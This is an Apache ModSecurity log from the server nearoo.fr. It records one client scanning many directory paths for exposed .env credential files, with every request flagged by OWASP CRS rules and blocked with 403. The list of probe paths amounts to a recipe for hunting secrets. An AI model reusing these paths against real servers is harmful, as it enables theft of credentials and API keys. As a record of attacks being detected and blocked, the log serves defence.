[Mon May 11 16:54:31.992150 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/panel/.env"] [unique_id "agHtp0WKUxpmnkK7zHyHJQAAAQI"]
[Mon May 11 16:54:32.185041 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/crm/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHJwAAAQI"]
[Mon May 11 16:54:32.185281 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/crm/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHJwAAAQI"]
[Mon May 11 16:54:32.185511 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/crm/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHJwAAAQI"]
[Mon May 11 16:54:32.359186 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/erp/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKAAAAQI"]
[Mon May 11 16:54:32.359405 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/erp/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKAAAAQI"]
[Mon May 11 16:54:32.359621 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/erp/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKAAAAQI"]
[Mon May 11 16:54:32.620526 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/shop/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKQAAAQI"]
[Mon May 11 16:54:32.620702 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/shop/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKQAAAQI"]
[Mon May 11 16:54:32.620918 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/shop/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKQAAAQI"]
[Mon May 11 16:54:32.775056 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/store/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKgAAAQI"]
[Mon May 11 16:54:32.775251 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/store/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKgAAAQI"]
[Mon May 11 16:54:32.775465 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/store/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKgAAAQI"]
[Mon May 11 16:54:32.899139 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/saas/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKwAAAQI"]
[Mon May 11 16:54:32.899475 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/saas/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKwAAAQI"]
[Mon May 11 16:54:32.899817 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/saas/.env"] [unique_id "agHtqEWKUxpmnkK7zHyHKwAAAQI"]
[Mon May 11 16:54:33.193992 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/client/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLAAAAQI"]
[Mon May 11 16:54:33.194209 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/client/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLAAAAQI"]
[Mon May 11 16:54:33.194442 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/client/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLAAAAQI"]
[Mon May 11 16:54:33.413046 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/project/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLQAAAQI"]
[Mon May 11 16:54:33.413420 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/project/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLQAAAQI"]
[Mon May 11 16:54:33.413787 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/project/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLQAAAQI"]
[Mon May 11 16:54:33.667039 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/admin-panel/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLwAAAQI"]
[Mon May 11 16:54:33.667288 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/admin-panel/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLwAAAQI"]
[Mon May 11 16:54:33.667535 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/admin-panel/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHLwAAAQI"]
[Mon May 11 16:54:33.864135 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/control-panel/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHMAAAAQI"]
[Mon May 11 16:54:33.864377 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/control-panel/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHMAAAAQI"]
[Mon May 11 16:54:33.864593 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/control-panel/.env"] [unique_id "agHtqUWKUxpmnkK7zHyHMAAAAQI"]
[Mon May 11 16:54:34.002862 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/user-panel/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMQAAAQI"]
[Mon May 11 16:54:34.003084 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/user-panel/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMQAAAQI"]
[Mon May 11 16:54:34.003335 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/user-panel/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMQAAAQI"]
[Mon May 11 16:54:34.177053 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/node/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMgAAAQI"]
[Mon May 11 16:54:34.177306 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/node/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMgAAAQI"]
[Mon May 11 16:54:34.177534 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/node/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMgAAAQI"]
[Mon May 11 16:54:34.351617 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/express/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMwAAAQI"]
[Mon May 11 16:54:34.351821 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/express/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMwAAAQI"]
[Mon May 11 16:54:34.352051 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/express/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHMwAAAQI"]
[Mon May 11 16:54:34.508251 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/next/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNAAAAQI"]
[Mon May 11 16:54:34.508457 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/next/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNAAAAQI"]
[Mon May 11 16:54:34.508695 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/next/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNAAAAQI"]
